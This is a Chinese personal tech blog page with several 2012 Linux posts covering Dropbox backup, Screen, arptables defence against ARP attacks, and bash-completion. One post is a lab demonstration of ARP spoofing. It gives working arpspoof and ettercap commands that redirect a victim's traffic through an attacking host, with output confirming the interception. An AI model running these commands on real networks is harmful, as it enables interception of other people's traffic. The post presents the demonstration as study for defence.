海运的博客

Linux VPS服务器使用Dropbox备份数据

发布时间:September 19, 2012 // 分类:备份存储 // No Comments

1.首先登录www.dropbox.com注册账号,可免费获得2G空间。
2.Linux VPS服务器下安装Dropbox客户端用于上传、下载数据:

#32位系统:
cd ~ && wget -O - "https://www.dropbox.com/download?plat=lnx.x86" | tar xzf -
#64位系统:
cd ~ && wget -O - "https://www.dropbox.com/download?plat=lnx.x86_64" | tar xzf -

启动Dropbox客户端,此程序在后台运行时会自动同步客户端与服务器端的数据。

~/.dropbox-dist/dropboxd &

启动后会提示以下信息要求绑定客户端:

#https://www.haiyun.me
Please visit https://www.dropbox.com/cli_link?host_id=12345678910457bb3364bb568ed&cl=en_US to link this machine.

通过浏览器访问以上网址输入账号密码即可绑定客户端:
网页确认dropbox绑定.png
绑定成功后客户shell窗口会提示:

Client successfully linked, Welcome onovps!

然后将要上传到Dropbox的文件放到家目录Dropbox目录下即可自动上传处理,也可将网站目录链接到此目录下实现网站自动备份:

ln -s /home/www/www.haiyun.me ~/Dropbox/www.haiyun.me 

SSH管理服务器必备多窗口工具Screen使用

发布时间:August 19, 2012 // 分类:常用软件 // No Comments

在使用SSH管理服务器最怕的就是突然断开了,这样会导致当前运行的任务终止甚至造成数据丢失,使用Screen可避免此类事情的发生。
CentOS一般都自带Screen,安装也很方便:

yum install screen

Screen常用参数:

#https://www.haiyun.me
-ls #列出当前screen会话
-d #将指定的screen会话离线
-r #恢复指定的screen会话
-U #使用UTF-8编码
-R #先试图恢复离线的作业,若无离线作业则建立新的screen会话
-x #恢复之前离线的会话,使用-R多会话下适用
-S name #新建指定名称会话
-dmS name #以分离模式新建会话
-wipe #列出当前screen会话,并清除不正常的会话

在Screen窗口下常用快捷命令:

C-a c #新建会话
C-a n #下个会话
C-a p #前个会话
C-a 0-9 #切换指定会话
Ctrl+a [Space] #顺序切换会话
C-a C-a #两个常用会话间切换
C-a x #锁住当前会话
C-a d #分离当前会话
C-a z #后台执行当前会话
C-a w #列出当前所有会话
C-a t #显示系统时间和负载
C-a K #终止当前会话

应用示例:
进入Screen会话:

screen

分离当前会话:

C-a d
#即按Ctrl不松开接着安a、d键

分离后不影响Screen会话中的任务,查看分离的会话:

screen -ls

恢复分离的Screen会话:

screen -r <id>

Windows下使用Xshell连接可参考:Xsehll配合Screen再也不怕SSH会话意外断开

Linux下用arptables防arp攻击

发布时间:August 6, 2012 // 分类:Iptables // No Comments

Linux下网络层防火墙iptables很强大,链路层也有类似的防火墙arptables,可针对arp地址进行限制,防止ARP网关欺骗攻击,再配合静态绑定MAC向网关报告正确的本机MAC地址,有效解决ARP攻击问题。
Centos5安装:

#https://www.haiyun.me
wget http://superb-sea2.dl.sourceforge.net/project/ebtables/arptables/arptables-v0.0.3/arptables-v0.0.3-4.tar.gz
tar zxvf arptables-v0.0.3-4.tar.gz 
cd arptables-v0.0.3-4
make
make install

arptables规则设置:

arptables -F
arptables -P INPUT ACCEPT
#默认策略
arptables -A INPUT --src-ip 192.168.1.1 --src-mac 7A:31:14:42:10:01 -j ACCEPT
#允许本网段特定MAC可进入,且IP与MAC相符
arptables -A INPUT --src-mac ! 74:8E:F8:53:DC:C0 -j DROP
#拒绝非网关MAC
arptables -A INPUT --src-ip ! 192.168.1.1 -j DROP
#拒绝非网关IP

保存规则并开机加载:

iptables-save > /etc/sysconfig/arptables
/etc/init.d/arptables save
chkconfig arptables on

规则保存后重新加载会出错,去除以下文件内-o any字段。

/etc/sysconfig/arptables 

Linux下模拟ARP欺骗代理攻击实验

发布时间:August 6, 2012 // 分类:网络安全 // No Comments

有攻才有防,本次测试下ARP欺骗攻击,对防止ARP攻击有更好的了解,请勿用于非法用途。
测试网络环境如下:

路由网关IP:192.168.1.1 MAC:00:1F:A3:65:55:8D  
客户机A IP:192.168.1.3 MAC:00:0c:29:e7:cc:3b 
客户机B IP:192.168.1.5 MAC: 00:0c:29:c6:f8:da

客户机B用作ARP攻击欺骗,发起ARP包欺骗客户机A网关MAC为客户机B网卡MAC:

arpspoof -i eth0 -t 192.168.1.3 192.168.1.1
0:c:29:c6:f8:da 0:c:29:e7:cc:3b 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c6:f8:da
0:c:29:c6:f8:da 0:c:29:e7:cc:3b 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c6:f8:da

客户机B欺骗网关客户机A MAC地址为客户机B MAC:

arpspoof -i eth0 -t 192.168.1.1 192.168.1.3
0:c:29:c6:f8:da 0:1f:a3:65:55:8d 0806 42: arp reply 192.168.1.3 is-at 0:c:29:c6:f8:da
0:c:29:c6:f8:da 0:1f:a3:65:55:8d 0806 42: arp reply 192.168.1.3 is-at 0:c:29:c6:f8:da

或:

ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.3/

客户机B开启数据包转发功能:

echo 1 > /proc/sys/net/ipv4/ip_forward

网关tracert客户机A:

traceroute 192.168.1.3
traceroute to 192.168.1.3 (192.168.1.3), 30 hops max, 38 byte packets
 1  192.168.1.5 (192.168.1.5)  1.307 ms  1.750 ms  1.241 ms
 2  192.168.1.3 (192.168.1.3)  2.358 ms !C  7.161 ms !C  1.876 ms !C

客户机A tracert网关:

tracert 192.168.1.1
traceroute to 192.168.1.1 (192.168.1.1), 30 hops max, 40 byte packets
 1  192.168.1.5 (192.168.1.5)  2.111 ms  1.962 ms  1.903 ms
 2  192.168.1.1 (192.168.1.1)  1.863 ms  1.753 ms  5.969 ms

看到了吧,真是吭爹呀,都走客户机B代理了。。。。

Linux下命令参数自动补全bash-completion

发布时间:August 4, 2012 // 分类:常用软件 // No Comments

使用过ROS感觉其命令参数补全很强大,对于大多数命令不用特意记参数了,Linux也可通过安装bash-completion实现此功能。
bash-completion安装:

wget http://pkgs.repoforge.org/bash-completion/bash-completion-20060301-1.el6.rf.noarch.rpm
rpm -ivh bash-completion-20060301-1.el6.rf.noarch.rpm
echo '. /etc/bash_completion' >> /etc/bashrc 
source /etc/bashrc 

使用测试:
linux命令参数自动补全.png

分类
最新文章
最近回复
  • opnfense: 谢谢博主!!!解决问题了!!!我之前一直以为内置的odhcp6就是唯一管理ipv6的方式
  • liyk: 这个方法获取的IPv6大概20分钟之后就会失效,默认路由先消失,然后Global IPV6再消失
  • 海运: 不好意思,没有。
  • zongboa: 您好,請問一下有immortalwrt設定guest Wi-Fi的GUI教學嗎?感謝您。
  • 海运: 恩山有很多。
  • swsend: 大佬可以分享一下固件吗,谢谢。
  • Jimmy: 方法一 nghtp3步骤需要改成如下才能编译成功: git clone https://git...
  • 海运: 地址格式和udpxy一样,udpxy和msd_lite能用这个就能用。
  • 1: 怎么用 编译后的程序在家里路由器内任意一台设备上运行就可以吗?比如笔记本电脑 m参数是笔记本的...
  • 孤狼: ups_status_set: seems that UPS [BK650M2-CH] is ...